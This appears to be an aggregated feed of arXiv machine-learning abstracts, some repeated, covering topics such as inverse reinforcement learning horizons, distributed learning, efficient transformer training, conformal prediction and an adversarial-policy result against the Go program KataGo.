    Inverse reinforcement learning (IRL) algorithms often rely on (forward) reinforcement learning or planning over a given time horizon to compute an approximately optimal policy for a hypothesized reward function and then match this policy with expert demonstrations. The time horizon plays a critical role in determining both the accuracy of reward estimate and the computational efficiency of IRL algorithms. Interestingly, an effective time horizon shorter than the ground-truth value often produces better results faster. This work formally analyzes this phenomenon and provides an explanation: the time horizon controls the complexity of an induced policy class and mitigates overfitting with limited data. This analysis leads to a principled choice of the effective horizon for IRL. It also prompts us to reexamine the classic IRL formulation: it is more natural to learn jointly the reward and the effective horizon together rather than the reward alone with a given horizon. Our experimental results confirm the theoretical analysis.  ( 2 min )
    Online Distributed Learning with Quantized Finite-Time Coordination. (arXiv:2307.06620v1 [cs.LG])
    In this paper we consider online distributed learning problems. Online distributed learning refers to the process of training learning models on distributed data sources. In our setting a set of agents need to cooperatively train a learning model from streaming data. Differently from federated learning, the proposed approach does not rely on a central server but only on peer-to-peer communications among the agents. This approach is often used in scenarios where data cannot be moved to a centralized location due to privacy, security, or cost reasons. In order to overcome the absence of a central server, we propose a distributed algorithm that relies on a quantized, finite-time coordination protocol to aggregate the locally trained models. Furthermore, our algorithm allows for the use of stochastic gradients during local training. Stochastic gradients are computed using a randomly sampled subset of the local training data, which makes the proposed algorithm more efficient and scalable than traditional gradient descent. In our paper, we analyze the performance of the proposed algorithm in terms of the mean distance from the online solution. Finally, we present numerical results for a logistic regression task.  ( 2 min )
    Deep Neural Networks for Semiparametric Frailty Models via H-likelihood. (arXiv:2307.06581v1 [stat.ML])
    For prediction of clustered time-to-event data, we propose a new deep neural network based gamma frailty model (DNN-FM). An advantage of the proposed model is that the joint maximization of the new h-likelihood provides maximum likelihood estimators for fixed parameters and best unbiased predictors for random frailties. Thus, the proposed DNN-FM is trained by using a negative profiled h-likelihood as a loss function, constructed by profiling out the non-parametric baseline hazard. Experimental studies show that the proposed method enhances the prediction performance of the existing methods. A real data analysis shows that the inclusion of subject-specific frailties helps to improve prediction of the DNN based Cox model (DNN-Cox).  ( 2 min )
    Prescriptive Process Monitoring Under Resource Constraints: A Reinforcement Learning Approach. (arXiv:2307.06564v1 [cs.AI])
    Prescriptive process monitoring methods seek to optimize the performance of business processes by triggering interventions at runtime, thereby increasing the probability of positive case outcomes. These interventions are triggered according to an intervention policy. Reinforcement learning has been put forward as an approach to learning intervention policies through trial and error. Existing approaches in this space assume that the number of resources available to perform interventions in a process is unlimited, an unrealistic assumption in practice. This paper argues that, in the presence of resource constraints, a key dilemma in the field of prescriptive process monitoring is to trigger interventions based not only on predictions of their necessity, timeliness, or effect but also on the uncertainty of these predictions and the level of resource utilization. Indeed, committing scarce resources to an intervention when the necessity or effects of this intervention are highly uncertain may intuitively lead to suboptimal intervention effects. Accordingly, the paper proposes a reinforcement learning approach for prescriptive process monitoring that leverages conformal prediction techniques to consider the uncertainty of the predictions upon which an intervention decision is based. An evaluation using real-life datasets demonstrates that explicitly modeling uncertainty using conformal predictions helps reinforcement learning agents converge towards policies with higher net intervention gain  ( 2 min )
    No Train No Gain: Revisiting Efficient Training Algorithms For Transformer-based Language Models. (arXiv:2307.06440v1 [cs.LG])
    The computation necessary for training Transformer-based language models has skyrocketed in recent years. This trend has motivated research on efficient training algorithms designed to improve training, validation, and downstream performance faster than standard training. In this work, we revisit three categories of such algorithms: dynamic architectures (layer stacking, layer dropping), batch selection (selective backprop, RHO loss), and efficient optimizers (Lion, Sophia). When pre-training BERT and T5 with a fixed computation budget using such methods, we find that their training, validation, and downstream gains vanish compared to a baseline with a fully-decayed learning rate. We define an evaluation protocol that enables computation to be done on arbitrary machines by mapping all computation time to a reference machine which we call reference system time. We discuss the limitations of our proposed protocol and release our code to encourage rigorous research in efficient training procedures: https://github.com/JeanKaddour/NoTrainNoGain.  ( 2 min )
    Tensor Decompositions Meet Control Theory: Learning General Mixtures of Linear Dynamical Systems. (arXiv:2307.06538v1 [cs.LG])
    Recently Chen and Poor initiated the study of learning mixtures of linear dynamical systems. While linear dynamical systems already have wide-ranging applications in modeling time-series data, using mixture models can lead to a better fit or even a richer understanding of underlying subpopulations represented in the data. In this work we give a new approach to learning mixtures of linear dynamical systems that is based on tensor decompositions. As a result, our algorithm succeeds without strong separation conditions on the components, and can be used to compete with the Bayes optimal clustering of the trajectories. Moreover our algorithm works in the challenging partially-observed setting. Our starting point is the simple but powerful observation that the classic Ho-Kalman algorithm is a close relative of modern tensor decomposition methods for learning latent variable models. This gives us a playbook for how to extend it to work with more complicated generative models.  ( 2 min )
    DSV: An Alignment Validation Loss for Self-supervised Outlier Model Selection. (arXiv:2307.06534v1 [cs.LG])
    Self-supervised learning (SSL) has proven effective in solving various problems by generating internal supervisory signals. Unsupervised anomaly detection, which faces the high cost of obtaining true labels, is an area that can greatly benefit from SSL. However, recent literature suggests that tuning the hyperparameters (HP) of data augmentation functions is crucial to the success of SSL-based anomaly detection (SSAD), yet a systematic method for doing so remains unknown. In this work, we propose DSV (Discordance and Separability Validation), an unsupervised validation loss to select high-performing detection models with effective augmentation HPs. DSV captures the alignment between an augmentation function and the anomaly-generating mechanism with surrogate losses, which approximate the discordance and separability of test data, respectively. As a result, the evaluation via DSV leads to selecting an effective SSAD model exhibiting better alignment, which results in high detection accuracy. We theoretically derive the degree of approximation conducted by the surrogate losses and empirically show that DSV outperforms a wide range of baselines on 21 real-world tasks.  ( 2 min )
    Ageing Analysis of Embedded SRAM on a Large-Scale Testbed Using Machine Learning. (arXiv:2307.06693v1 [cs.AR])
    Ageing detection and failure prediction are essential in many Internet of Things (IoT) deployments, which operate huge quantities of embedded devices unattended in the field for years. In this paper, we present a large-scale empirical analysis of natural SRAM wear-out using 154 boards from a general-purpose testbed. Starting from SRAM initialization bias, which each node can easily collect at startup, we apply various metrics for feature extraction and experiment with common machine learning methods to predict the age of operation for this node. Our findings indicate that even though ageing impacts are subtle, our indicators can well estimate usage times with an $R^2$ score of 0.77 and a mean error of 24% using regressors, and with an F1 score above 0.6 for classifiers applying a six-months resolution.
    IntelliGraphs: Datasets for Benchmarking Knowledge Graph Generation. (arXiv:2307.06698v1 [cs.AI])
    Knowledge Graph Embedding (KGE) models are used to learn continuous representations of entities and relations. A key task in the literature is predicting missing links between entities. However, Knowledge Graphs are not just sets of links but also have semantics underlying their structure. Semantics is crucial in several downstream tasks, such as query answering or reasoning. We introduce the subgraph inference task, where a model has to generate likely and semantically valid subgraphs. We propose IntelliGraphs, a set of five new Knowledge Graph datasets. The IntelliGraphs datasets contain subgraphs with semantics expressed in logical rules for evaluating subgraph inference. We also present the dataset generator that produced the synthetic datasets. We designed four novel baseline models, which include three models based on traditional KGEs. We evaluate their expressiveness and show that these models cannot capture the semantics. We believe this benchmark will encourage the development of machine learning models that emphasize semantic understanding.
    Bregman Deviations of Generic Exponential Families. (arXiv:2201.07306v4 [cs.LG] UPDATED)
    We revisit the method of mixture technique, also known as the Laplace method, to study the concentration phenomenon in generic exponential families. Combining the properties of Bregman divergence associated with log-partition function of the family with the method of mixtures for super-martingales, we establish a generic bound controlling the Bregman divergence between the parameter of the family and a finite sample estimate of the parameter. Our bound is time-uniform and makes appear a quantity extending the classical information gain to exponential families, which we call the Bregman information gain. For the practitioner, we instantiate this novel bound to several classical families, e.g., Gaussian, Bernoulli, Exponential, Weibull, Pareto, Poisson and Chi-square yielding explicit forms of the confidence sets and the Bregman information gain. We further numerically compare the resulting confidence bounds to state-of-the-art alternatives for time-uniform concentration and show that this novel method yields competitive results. Finally, we highlight the benefit of our concentration bounds on some illustrative applications.
    Spectral-Bias and Kernel-Task Alignment in Physically Informed Neural Networks. (arXiv:2307.06362v1 [stat.ML])
    Physically informed neural networks (PINNs) are a promising emerging method for solving differential equations. As in many other deep learning approaches, the choice of PINN design and training protocol requires careful craftsmanship. Here, we suggest a comprehensive theoretical framework that sheds light on this important problem. Leveraging an equivalence between infinitely over-parameterized neural networks and Gaussian process regression (GPR), we derive an integro-differential equation that governs PINN prediction in the large data-set limit -- the Neurally-Informed Equation (NIE). This equation augments the original one by a kernel term reflecting architecture choices and allows quantifying implicit bias induced by the network via a spectral decomposition of the source term in the original differential equation.
    Incomplete Utterance Rewriting as Sequential Greedy Tagging. (arXiv:2307.06337v1 [cs.LG])
    The task of incomplete utterance rewriting has recently gotten much attention. Previous models struggled to extract information from the dialogue context, as evidenced by the low restoration scores. To address this issue, we propose a novel sequence tagging-based model, which is more adept at extracting information from context. Meanwhile, we introduce speaker-aware embedding to model speaker variation. Experiments on multiple public datasets show that our model achieves optimal results on all nine restoration scores while having other metric scores comparable to previous state-of-the-art models. Furthermore, benefitting from the model's simplicity, our approach outperforms most previous models on inference speed.
  • Open

    balance -- a Python package for balancing biased data samples. (arXiv:2307.06024v2 [stat.CO] UPDATED)
    Surveys are an important research tool, providing unique measurements on subjective experiences such as sentiment and opinions that cannot be measured by other means. However, because survey data is collected from a self-selected group of participants, directly inferring insights from it to a population of interest, or training ML models on such data, can lead to erroneous estimates or under-performing models. In this paper we present balance, an open-source Python package by Meta, offering a simple workflow for analyzing and adjusting biased data samples with respect to a population of interest. The balance workflow includes three steps: understanding the initial bias in the data relative to a target we would like to infer, adjusting the data to correct for the bias by producing weights for each unit in the sample based on propensity scores, and evaluating the final biases and the variance inflation after applying the fitted weights. The package provides a simple API that can be used by researchers and data scientists from a wide range of fields on a variety of data. The paper provides the relevant context, methodological background, and presents the package's API.
    Convergence of Message Passing Graph Neural Networks with Generic Aggregation On Large Random Graphs. (arXiv:2304.11140v2 [stat.ML] UPDATED)
    We study the convergence of message passing graph neural networks on random graph models to their continuous counterpart as the number of nodes tends to infinity. Until now, this convergence was only known for architectures with aggregation functions in the form of normalized means, or, equivalently, of an application of classical operators like the adjacency matrix or the graph Laplacian. We extend such results to a large class of aggregation functions, that encompasses all classically used message passing graph neural networks, such as attention-based message passing, max convolutional message passing or (degree-normalized) convolutional message passing. Under mild assumptions, we give non-asymptotic bounds with high probability to quantify this convergence. Our main result is based on the McDiarmid inequality. Interestingly, this result does not apply to the case where the aggregation is a coordinate-wise maximum. We treat this case separately and obtain a different convergence rate.
    Tensor Completion Made Practical. (arXiv:2006.03134v2 [cs.DS] CROSS LISTED)
    Tensor completion is a natural higher-order generalization of matrix completion where the goal is to recover a low-rank tensor from sparse observations of its entries. Existing algorithms are either heuristic without provable guarantees, based on solving large semidefinite programs which are impractical to run, or make strong assumptions such as requiring the factors to be nearly orthogonal. In this paper we introduce a new variant of alternating minimization, which in turn is inspired by understanding how the progress measures that guide convergence of alternating minimization in the matrix setting need to be adapted to the tensor setting. We show strong provable guarantees, including showing that our algorithm converges linearly to the true tensors even when the factors are highly correlated and can be implemented in nearly linear time. Moreover our algorithm is also highly practical and we show that we can complete third order tensors with a thousand dimensions from observing a tiny fraction of its entries. In contrast, and somewhat surprisingly, we show that the standard version of alternating minimization, without our new twist, can converge at a drastically slower rate in practice.
    Emergent Neural Network Mechanisms for Generalization to Objects in Novel Orientations. (arXiv:2109.13445v2 [cs.CV] UPDATED)
    The capability of Deep Neural Networks (DNNs) to recognize objects in orientations outside the distribution of the training data is not well understood. We present evidence that DNNs are capable of generalizing to objects in novel orientations by disseminating orientation-invariance obtained from familiar objects seen from many viewpoints. This capability strengthens when training the DNN with an increasing number of familiar objects, but only in orientations that involve 2D rotations of familiar orientations. We show that this dissemination is achieved via neurons tuned to common features between familiar and unfamiliar objects. These results implicate brain-like neural mechanisms for generalization.
    Bayesian taut splines for estimating the number of modes. (arXiv:2307.05825v1 [stat.ME] CROSS LISTED)
    The number of modes in a probability density function is representative of the model's complexity and can also be viewed as the number of existing subpopulations. Despite its relevance, little research has been devoted to its estimation. Focusing on the univariate setting, we propose a novel approach targeting prediction accuracy inspired by some overlooked aspects of the problem. We argue for the need for structure in the solutions, the subjective and uncertain nature of modes, and the convenience of a holistic view blending global and local density properties. Our method builds upon a combination of flexible kernel estimators and parsimonious compositional splines. Feature exploration, model selection and mode testing are implemented in the Bayesian inference paradigm, providing soft solutions and allowing to incorporate expert judgement in the process. The usefulness of our proposal is illustrated through a case study in sports analytics, showcasing multiple companion visualisation tools. A thorough simulation study demonstrates that traditional modality-driven approaches paradoxically struggle to provide accurate results. In this context, our method emerges as a top-tier alternative offering innovative solutions for analysts.
    Towards Learning to Imitate from a Single Video Demonstration. (arXiv:1901.07186v4 [cs.LG] UPDATED)
    Agents that can learn to imitate given video observation -- \emph{without direct access to state or action information} are more applicable to learning in the natural world. However, formulating a reinforcement learning (RL) agent that facilitates this goal remains a significant challenge. We approach this challenge using contrastive training to learn a reward function comparing an agent's behaviour with a single demonstration. We use a Siamese recurrent neural network architecture to learn rewards in space and time between motion clips while training an RL policy to minimize this distance. Through experimentation, we also find that the inclusion of multi-task data and additional image encoding losses improve the temporal consistency of the learned rewards and, as a result, significantly improves policy learning. We demonstrate our approach on simulated humanoid, dog, and raptor agents in 2D and a quadruped and a humanoid in 3D. We show that our method outperforms current state-of-the-art techniques in these environments and can learn to imitate from a single video demonstration.
    Accelerated stochastic approximation with state-dependent noise. (arXiv:2307.01497v2 [math.OC] UPDATED)
    We consider a class of stochastic smooth convex optimization problems under rather general assumptions on the noise in the stochastic gradient observation. As opposed to the classical problem setting in which the variance of noise is assumed to be uniformly bounded, herein we assume that the variance of stochastic gradients is related to the "sub-optimality" of the approximate solutions delivered by the algorithm. Such problems naturally arise in a variety of applications, in particular, in the well-known generalized linear regression problem in statistics. However, to the best of our knowledge, none of the existing stochastic approximation algorithms for solving this class of problems attain optimality in terms of the dependence on accuracy, problem parameters, and mini-batch size. We discuss two non-Euclidean accelerated stochastic approximation routines--stochastic accelerated gradient descent (SAGD) and stochastic gradient extrapolation (SGE)--which carry a particular duality relationship. We show that both SAGD and SGE, under appropriate conditions, achieve the optimal convergence rate, attaining the optimal iteration and sample complexities simultaneously. However, corresponding assumptions for the SGE algorithm are more general; they allow, for instance, for efficient application of the SGE to statistical estimation problems under heavy tail noises and discontinuous score functions. We also discuss the application of the SGE to problems satisfying quadratic growth conditions, and show how it can be used to recover sparse solutions. Finally, we report on some simulation experiments to illustrate numerical performance of our proposed algorithms in high-dimensional settings.
    Cramer Type Distances for Learning Gaussian Mixture Models by Gradient Descent. (arXiv:2307.06753v1 [cs.LG])
    The learning of Gaussian Mixture Models (also referred to simply as GMMs) plays an important role in machine learning. Known for their expressiveness and interpretability, Gaussian mixture models have a wide range of applications, from statistics, computer vision to distributional reinforcement learning. However, as of today, few known algorithms can fit or learn these models, some of which include Expectation-Maximization algorithms and Sliced Wasserstein Distance. Even fewer algorithms are compatible with gradient descent, the common learning process for neural networks. In this paper, we derive a closed formula of two GMMs in the univariate, one-dimensional case, then propose a distance function called Sliced Cram\'er 2-distance for learning general multivariate GMMs. Our approach has several advantages over many previous methods. First, it has a closed-form expression for the univariate case and is easy to compute and implement using common machine learning libraries (e.g., PyTorch and TensorFlow). Second, it is compatible with gradient descent, which enables us to integrate GMMs with neural networks seamlessly. Third, it can fit a GMM not only to a set of data points, but also to another GMM directly, without sampling from the target model. And fourth, it has some theoretical guarantees like global gradient boundedness and unbiased sampling gradient. These features are especially useful for distributional reinforcement learning and Deep Q Networks, where the goal is to learn a distribution over future rewards. We will also construct a Gaussian Mixture Distributional Deep Q Network as a toy example to demonstrate its effectiveness. Compared with previous models, this model is parameter efficient in terms of representing a distribution and possesses better interpretability.
    On the Validity of Conformal Prediction for Network Data Under Non-Uniform Sampling. (arXiv:2306.07252v4 [math.ST] UPDATED)
    We study the properties of conformal prediction for network data under various sampling mechanisms that commonly arise in practice but often result in a non-representative sample of nodes. We interpret these sampling mechanisms as selection rules applied to a superpopulation and study the validity of conformal prediction conditional on an appropriate selection event. We show that the sampled subarray is exchangeable conditional on the selection event if the selection rule satisfies a permutation invariance property and a joint exchangeability condition holds for the superpopulation. Our result implies the finite-sample validity of conformal prediction for certain selection events related to ego networks and snowball sampling. We also show that when data are sampled via a random walk on a graph, a variant of weighted conformal prediction yields asymptotically valid prediction sets for an independently selected node from the population.
    Learning Graph ARMA Processes from Time-Vertex Spectra. (arXiv:2302.06887v2 [stat.ML] UPDATED)
    The modeling of time-varying graph signals as stationary time-vertex stochastic processes permits the inference of missing signal values by efficiently employing the correlation patterns of the process across different graph nodes and time instants. In this study, we propose an algorithm for computing graph autoregressive moving average (graph ARMA) processes based on learning the joint time-vertex power spectral density of the process from its incomplete realizations for the task of signal interpolation. Our solution relies on first roughly estimating the joint spectrum of the process from partially observed realizations and then refining this estimate by projecting it onto the spectrum manifold of the graph ARMA process through convex relaxations. The initially missing signal values are then estimated based on the learnt model. Experimental results show that the proposed approach achieves high accuracy in time-vertex signal estimation problems.
    An Improved Uniform Convergence Bound with Fat-Shattering Dimension. (arXiv:2307.06644v1 [cs.LG])
    The fat-shattering dimension characterizes the uniform convergence property of real-valued functions. The state-of-the-art upper bounds feature a multiplicative squared logarithmic factor on the sample complexity, leaving an open gap with the existing lower bound. We provide an improved uniform convergence bound that closes this gap.
    Spectral-Bias and Kernel-Task Alignment in Physically Informed Neural Networks. (arXiv:2307.06362v1 [stat.ML])
    Physically informed neural networks (PINNs) are a promising emerging method for solving differential equations. As in many other deep learning approaches, the choice of PINN design and training protocol requires careful craftsmanship. Here, we suggest a comprehensive theoretical framework that sheds light on this important problem. Leveraging an equivalence between infinitely over-parameterized neural networks and Gaussian process regression (GPR), we derive an integro-differential equation that governs PINN prediction in the large data-set limit -- the Neurally-Informed Equation (NIE). This equation augments the original one by a kernel term reflecting architecture choices and allows quantifying implicit bias induced by the network via a spectral decomposition of the source term in the original differential equation.
    Robust online active learning. (arXiv:2302.00422v5 [stat.ML] UPDATED)
    In many industrial applications, obtaining labeled observations is not straightforward as it often requires the intervention of human experts or the use of expensive testing equipment. In these circumstances, active learning can be highly beneficial in suggesting the most informative data points to be used when fitting a model. Reducing the number of observations needed for model development alleviates both the computational burden required for training and the operational expenses related to labeling. Online active learning, in particular, is useful in high-volume production processes where the decision about the acquisition of the label for a data point needs to be taken within an extremely short time frame. However, despite the recent efforts to develop online active learning strategies, the behavior of these methods in the presence of outliers has not been thoroughly examined. In this work, we investigate the performance of online active linear regression in contaminated data streams. Our study shows that the currently available query strategies are prone to sample outliers, whose inclusion in the training set eventually degrades the predictive performance of the models. To address this issue, we propose a solution that bounds the search area of a conditional D-optimal algorithm and uses a robust estimator. Our approach strikes a balance between exploring unseen regions of the input space and protecting against outliers. Through numerical simulations, we show that the proposed method is effective in improving the performance of online active learning in the presence of outliers, thus expanding the potential applications of this powerful tool.  ( 3 min )
    Multivariate Time Series characterization and forecasting of VoIP traffic in real mobile networks. (arXiv:2307.06645v1 [cs.NI])
    Predicting the behavior of real-time traffic (e.g., VoIP) in mobility scenarios could help the operators to better plan their network infrastructures and to optimize the allocation of resources. Accordingly, in this work the authors propose a forecasting analysis of crucial QoS/QoE descriptors (some of which neglected in the technical literature) of VoIP traffic in a real mobile environment. The problem is formulated in terms of a multivariate time series analysis. Such a formalization allows to discover and model the temporal relationships among various descriptors and to forecast their behaviors for future periods. Techniques such as Vector Autoregressive models and machine learning (deep-based and tree-based) approaches are employed and compared in terms of performance and time complexity, by reframing the multivariate time series problem into a supervised learning one. Moreover, a series of auxiliary analyses (stationarity, orthogonal impulse responses, etc.) are performed to discover the analytical structure of the time series and to provide deep insights about their relationships. The whole theoretical analysis has an experimental counterpart since a set of trials across a real-world LTE-Advanced environment has been performed to collect, post-process and analyze about 600,000 voice packets, organized per flow and differentiated per codec.  ( 2 min )
    Multiple Testing Framework for Out-of-Distribution Detection. (arXiv:2206.09522v4 [stat.ML] UPDATED)
    We study the problem of Out-of-Distribution (OOD) detection, that is, detecting whether a learning algorithm's output can be trusted at inference time. While a number of tests for OOD detection have been proposed in prior work, a formal framework for studying this problem is lacking. We propose a definition for the notion of OOD that includes both the input distribution and the learning algorithm, which provides insights for the construction of powerful tests for OOD detection. We propose a multiple hypothesis testing inspired procedure to systematically combine any number of different statistics from the learning algorithm using conformal p-values. We further provide strong guarantees on the probability of incorrectly classifying an in-distribution sample as OOD. In our experiments, we find that threshold-based tests proposed in prior work perform well in specific settings, but not uniformly well across different types of OOD instances. In contrast, our proposed method that combines multiple statistics performs uniformly well across different datasets and neural networks.  ( 2 min )
    Adversarial Policies Beat Superhuman Go AIs. (arXiv:2211.00241v4 [cs.LG] UPDATED)
    We attack the state-of-the-art Go-playing AI system KataGo by training adversarial policies against it, achieving a >97% win rate against KataGo running at superhuman settings. Our adversaries do not win by playing Go well. Instead, they trick KataGo into making serious blunders. Our attack transfers zero-shot to other superhuman Go-playing AIs, and is comprehensible to the extent that human experts can implement it without algorithmic assistance to consistently beat superhuman AIs. The core vulnerability uncovered by our attack persists even in KataGo agents adversarially trained to defend against our attack. Our results demonstrate that even superhuman AI systems may harbor surprising failure modes. Example games are available https://goattack.far.ai/.  ( 2 min )
    Deep Neural Networks for Semiparametric Frailty Models via H-likelihood. (arXiv:2307.06581v1 [stat.ML])
    For prediction of clustered time-to-event data, we propose a new deep neural network based gamma frailty model (DNN-FM). An advantage of the proposed model is that the joint maximization of the new h-likelihood provides maximum likelihood estimators for fixed parameters and best unbiased predictors for random frailties. Thus, the proposed DNN-FM is trained by using a negative profiled h-likelihood as a loss function, constructed by profiling out the non-parametric baseline hazard. Experimental studies show that the proposed method enhances the prediction performance of the existing methods. A real data analysis shows that the inclusion of subject-specific frailties helps to improve prediction of the DNN based Cox model (DNN-Cox).  ( 2 min )
    An Image-Denoising Framework Fit for Quantum Annealing via QUBO and Restricted Boltzmann Machines. (arXiv:2307.06542v1 [quant-ph])
    We investigate a framework for binary image denoising via restricted Boltzmann machines (RBMs) that introduces a denoising objective in quadratic unconstrained binary optimization (QUBO) form and is well-suited for quantum annealing. The denoising objective is attained by balancing the distribution learned by a trained RBM with a penalty term for derivations from the noisy image. We derive the statistically optimal choice of the penalty parameter assuming the target distribution has been well-approximated, and further suggest an empirically supported modification to make the method robust to that idealistic assumption. We also show under additional assumptions that the denoised images attained by our method are, in expectation, strictly closer to the noise-free images than the noisy images are. While we frame the model as an image denoising model, it can be applied to any binary data. As the QUBO formulation is well-suited for implementation on quantum annealers, we test the model on a D-Wave Advantage machine, and also test on data too large for current quantum annealers by approximating QUBO solutions through classical heuristics.  ( 2 min )
    A Deep Learning Method for Comparing Bayesian Hierarchical Models. (arXiv:2301.11873v3 [stat.ML] UPDATED)
    Bayesian model comparison (BMC) offers a principled approach for assessing the relative merits of competing computational models and propagating uncertainty into model selection decisions. However, BMC is often intractable for the popular class of hierarchical models due to their high-dimensional nested parameter structure. To address this intractability, we propose a deep learning method for performing BMC on any set of hierarchical models which can be instantiated as probabilistic programs. Since our method enables amortized inference, it allows efficient re-estimation of posterior model probabilities and fast performance validation prior to any real-data application. In a series of extensive validation studies, we benchmark the performance of our method against the state-of-the-art bridge sampling method and demonstrate excellent amortized inference across all BMC settings. We then showcase our method by comparing four hierarchical evidence accumulation models that have previously been deemed intractable for BMC due to partly implicit likelihoods. In this application, we corroborate evidence for the recently proposed L\'evy flight model of decision-making and show how transfer learning can be leveraged to enhance training efficiency. We provide reproducible code for all analyses and an open-source implementation of our method.  ( 2 min )
    Adapting to Mixing Time in Stochastic Optimization with Markovian Data. (arXiv:2202.04428v3 [cs.LG] UPDATED)
    We consider stochastic optimization problems where data is drawn from a Markov chain. Existing methods for this setting crucially rely on knowing the mixing time of the chain, which in real-world applications is usually unknown. We propose the first optimization method that does not require the knowledge of the mixing time, yet obtains the optimal asymptotic convergence rate when applied to convex problems. We further show that our approach can be extended to: (i) finding stationary points in non-convex optimization with Markovian data, and (ii) obtaining better dependence on the mixing time in temporal difference (TD) learning; in both cases, our method is completely oblivious to the mixing time. Our method relies on a novel combination of multi-level Monte Carlo (MLMC) gradient estimation together with an adaptive learning method.  ( 2 min )
    Learning low-rank latent mesoscale structures in networks. (arXiv:2102.06984v5 [cs.SI] UPDATED)
    It is common to use networks to encode the architecture of interactions between entities in complex systems in the physical, biological, social, and information sciences. To study the large-scale behavior of complex systems, it is useful to examine mesoscale structures in networks as building blocks that influence such behavior. We present a new approach for describing low-rank mesoscale structures in networks, and we illustrate our approach using several synthetic network models and empirical friendship, collaboration, and protein--protein interaction (PPI) networks. We find that these networks possess a relatively small number of `latent motifs' that together can successfully approximate most subgraphs of a network at a fixed mesoscale. We use an algorithm for `network dictionary learning' (NDL), which combines a network-sampling method and nonnegative matrix factorization, to learn the latent motifs of a given network. The ability to encode a network using a set of latent motifs has a wide variety of applications to network-analysis tasks, such as comparison, denoising, and edge inference. Additionally, using a new network denoising and reconstruction (NDR) algorithm, we demonstrate how to denoise a corrupted network by using only the latent motifs that one learns directly from the corrupted network.  ( 3 min )
    Deep Network Approximation: Beyond ReLU to Diverse Activation Functions. (arXiv:2307.06555v1 [cs.LG])
    This paper explores the expressive power of deep neural networks for a diverse range of activation functions. An activation function set $\mathscr{A}$ is defined to encompass the majority of commonly used activation functions, such as $\mathtt{ReLU}$, $\mathtt{LeakyReLU}$, $\mathtt{ReLU}^2$, $\mathtt{ELU}$, $\mathtt{SELU}$, $\mathtt{Softplus}$, $\mathtt{GELU}$, $\mathtt{SiLU}$, $\mathtt{Swish}$, $\mathtt{Mish}$, $\mathtt{Sigmoid}$, $\mathtt{Tanh}$, $\mathtt{Arctan}$, $\mathtt{Softsign}$, $\mathtt{dSiLU}$, and $\mathtt{SRS}$. We demonstrate that for any activation function $\varrho\in \mathscr{A}$, a $\mathtt{ReLU}$ network of width $N$ and depth $L$ can be approximated to arbitrary precision by a $\varrho$-activated network of width $6N$ and depth $2L$ on any bounded set. This finding enables the extension of most approximation results achieved with $\mathtt{ReLU}$ networks to a wide variety of other activation functions, at the cost of slightly larger constants.  ( 2 min )
    A kernel Stein test of goodness of fit for sequential models. (arXiv:2210.10741v3 [stat.ML] UPDATED)
    We propose a goodness-of-fit measure for probability densities modeling observations with varying dimensionality, such as text documents of differing lengths or variable-length sequences. The proposed measure is an instance of the kernel Stein discrepancy (KSD), which has been used to construct goodness-of-fit tests for unnormalized densities. The KSD is defined by its Stein operator: current operators used in testing apply to fixed-dimensional spaces. As our main contribution, we extend the KSD to the variable-dimension setting by identifying appropriate Stein operators, and propose a novel KSD goodness-of-fit test. As with the previous variants, the proposed KSD does not require the density to be normalized, allowing the evaluation of a large class of models. Our test is shown to perform well in practice on discrete sequential data benchmarks.  ( 2 min )
    Tensor Decompositions Meet Control Theory: Learning General Mixtures of Linear Dynamical Systems. (arXiv:2307.06538v1 [cs.LG])
    Recently Chen and Poor initiated the study of learning mixtures of linear dynamical systems. While linear dynamical systems already have wide-ranging applications in modeling time-series data, using mixture models can lead to a better fit or even a richer understanding of underlying subpopulations represented in the data. In this work we give a new approach to learning mixtures of linear dynamical systems that is based on tensor decompositions. As a result, our algorithm succeeds without strong separation conditions on the components, and can be used to compete with the Bayes optimal clustering of the trajectories. Moreover our algorithm works in the challenging partially-observed setting. Our starting point is the simple but powerful observation that the classic Ho-Kalman algorithm is a close relative of modern tensor decomposition methods for learning latent variable models. This gives us a playbook for how to extend it to work with more complicated generative models.  ( 2 min )
    A Novel Bayes' Theorem for Upper Probabilities. (arXiv:2307.06831v1 [stat.ML])
    In their seminal 1990 paper, Wasserman and Kadane establish an upper bound for the Bayes' posterior probability of a measurable set $A$, when the prior lies in a class of probability measures $\mathcal{P}$ and the likelihood is precise. They also give a sufficient condition for such upper bound to hold with equality. In this paper, we introduce a generalization of their result by additionally addressing uncertainty related to the likelihood. We give an upper bound for the posterior probability when both the prior and the likelihood belong to a set of probabilities. Furthermore, we give a sufficient condition for this upper bound to become an equality. This result is interesting on its own, and has the potential of being applied to various fields of engineering (e.g. model predictive control), machine learning, and artificial intelligence.  ( 2 min )
    The complexity of non-stationary reinforcement learning. (arXiv:2307.06877v1 [cs.LG])
    The problem of continual learning in the domain of reinforcement learning, often called non-stationary reinforcement learning, has been identified as an important challenge to the application of reinforcement learning. We prove a worst-case complexity result, which we believe captures this challenge: Modifying the probabilities or the reward of a single state-action pair in a reinforcement learning problem requires an amount of time almost as large as the number of states in order to keep the value function up to date, unless the strong exponential time hypothesis (SETH) is false; SETH is a widely accepted strengthening of the P $\neq$ NP conjecture. Recall that the number of states in current applications of reinforcement learning is typically astronomical. In contrast, we show that just $\textit{adding}$ a new state-action pair is considerably easier to implement.  ( 2 min )
    Weighted Averaged Stochastic Gradient Descent: Asymptotic Normality and Optimality. (arXiv:2307.06915v1 [stat.ML])
    Stochastic Gradient Descent (SGD) is one of the simplest and most popular algorithms in modern statistical and machine learning due to its computational and memory efficiency. Various averaging schemes have been proposed to accelerate the convergence of SGD in different settings. In this paper, we explore a general averaging scheme for SGD. Specifically, we establish the asymptotic normality of a broad range of weighted averaged SGD solutions and provide asymptotically valid online inference approaches. Furthermore, we propose an adaptive averaging scheme that exhibits both optimal statistical rate and favorable non-asymptotic convergence, drawing insights from the optimal weight for the linear model in terms of non-asymptotic mean squared error (MSE).  ( 2 min )
    Robust scalable initialization for Bayesian variational inference with multi-modal Laplace approximations. (arXiv:2307.06424v1 [stat.ME])
